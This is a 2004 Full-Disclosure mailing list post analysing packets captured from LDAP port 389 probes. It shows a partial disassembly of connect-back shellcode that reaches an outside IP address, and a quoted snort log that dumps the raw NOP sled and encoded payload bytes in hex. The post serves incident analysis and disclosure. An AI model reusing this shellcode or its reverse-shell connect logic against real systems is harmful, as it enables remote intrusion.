[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] (no subject)
- To: <intrusion@sans.org>, "Full-Disclosure@Lists. Netsys. Com" <full-disclosure@lists.netsys.com>
- Subject: [Full-Disclosure] (no subject)
- From: "Disclosure From OSSI" <disclosure@ossecurity.ca>
- Date: Thu, 26 Feb 2004 00:13:28 -0500
We grabbed the binary data from the sniff'ed below. After a quick reverse,
it turns out to be a connect-back shellcode with back server p->
24.19.147.225.
Partially disassembled:
00000084 68 18 13 93 E1 push 0E1931318h
00000089 68 02 00 22 E4 push 0E4220002h
0000008E 8B CC mov ecx, esp
00000090 6A 10 push 10h
00000092 51 push ecx
00000093 FF 76 24 push dword ptr [esi+24h]
00000096 FF D0 call eax
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
call eax=776ba5a3
776ba5a3 = WS2_32.dll!connect with para 3
Para 0 is socket # 00000094
Para 1 is name p-> 00dafcc4
Para 2 is namelen 00000010
sin_family AF_INET , port 8932 IP 24.19.147.225
call external 776ba5a3 stack 0000000c return ffffffff
; =================== a quick translation =================================
C:\TEMP>ping -a 24.19.147.225
Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of
data
Hope the info is useful to you.
Regards
Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/
> Date: Wed, 25 Feb 2004 08:46:26 -0800
> From: John Sage <jsage@finchhaven.com>
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Probes on port 389
>
> Just picked this up:
>
> On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> > From: "Schmehl, Paul L" <pauls@utdallas.edu>
> > To: <intrusion@sans.org>, <full-disclosure@lists.netsys.com>
> > Subject: [Full-Disclosure] Probes on port 389
> > Date: Tue, 24 Feb 2004 11:06:50 -0600
> >
> > I threw up a quick rule on snort to monitor probes on port 389 because I
> > have been seeing entries in /var/log/messages on some boxes that I am
> > responsible for. This morning we had a probe that hit 26205 different
> > IPs on that port in about 7 minutes (SYN scan only - no payload.) The
> > source IP was a mailserver in England. (They've been notified.)
>
> /* snip */
>
> input: snort.log.1077660886
> filter: ip and ( src host 24.6.176.211 )
> #
> T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
> #
> T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
> #
> T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
> 30 82 0a 3d 02 01 01 60 82 01 36 02 ff ff ff ff 0..=...`..6.....
> 50 a9 f7 00 10 13 90 90 90 90 90 90 90 90 90 90 P...............
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 90 90 90 90 90 90 90 90 90 eb 02 eb 05 e8 f9 ff ................
> ff ff 5b 80 c3 10 33 c9 66 b9 33 01 80 33 95 43 ..[...3.f.3..3.C
> e2 fa 14 79 05 94 95 95 1e 61 c0 c3 f1 34 a5 95 ...y.....a...4..
> 95 95 1e d5 99 1e e5 89 38 1e fd 9d 7e 95 1e 50 ........8...~..P
> cb c8 1c 93 6a a3 fd 1b db 9b 79 7d 38 95 95 95 ....j.....y}8...
> fd a6 a7 95 95 fd e2 e6 a7 ca c1 6a 45 1e 6d c2 ...........jE.m.
> fd 4c 9c 60 38 7d 06 95 95 95 a6 5c c4 c4 c4 c4 .L.`8}.....\....
> d4 c4 d4 c4 6a 45 1c d3 b1 c2 fd 79 6c 3f f5 7d ....jE.....yl?.}
> ec 95 95 95 fd 8d 86 06 74 fd 97 95 b7 71 1e 59 ........t....q.Y
> ff 85 c4 6a e3 b1 6a 45 fd f6 f8 f1 95 1c f3 a5 ...j..jE........
> 6a a3 fd e7 6b 26 83 7d c4 95 95 95 1c d3 8b 16 j...k&.}........
> 79 c1 18 a9 b1 a6 55 a6 5c 16 54 80 3e 77 68 53 y.....U.\.T.>whS
> d1 b1 85 d1 6b d1 b1 a8 6b d1 b1 a9 1e d3 b1 1c ....k...k.......
> d1 b1 dd 1c d1 b1 d9 1c d1 b1 c5 18 d1 b1 85 c1 ................
> c5 c4 c4 c4 ff 94 c4 c4 6a e3 a5 c4 6a c3 8b 6a ........j...j..j
> a3 fd 7a 5b 75 f5 7d 97 95 95 95 6a 45 c6 c0 c3 ..z[u.}....jE...
> c2 1e f9 b1 8d 1e d0 a9 1e c1 90 ed 96 40 1e df .............@..
> 8d 1e cf b5 96 48 76 a7 dc 1e a1 1e 96 60 a6 6a .....Hv......`.j
> 69 a6 55 39 af 51 e1 92 54 5a 98 96 6d 7e 67 ae i.U9.Q..TZ..m~g.
> e9 b1 81 e0 74 1e cf b1 96 48 f3 1e 99 de 1e cf ....t....H......
> 89 96 48 1e 91 1e 96 50 7e 97 a6 55 1e 40 ca cb ..H....P~..U.@..
> c8 ce 57 91 95 90 90 90 90 90 90 90 90 90 90 90 ..W.............
... deleted ...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html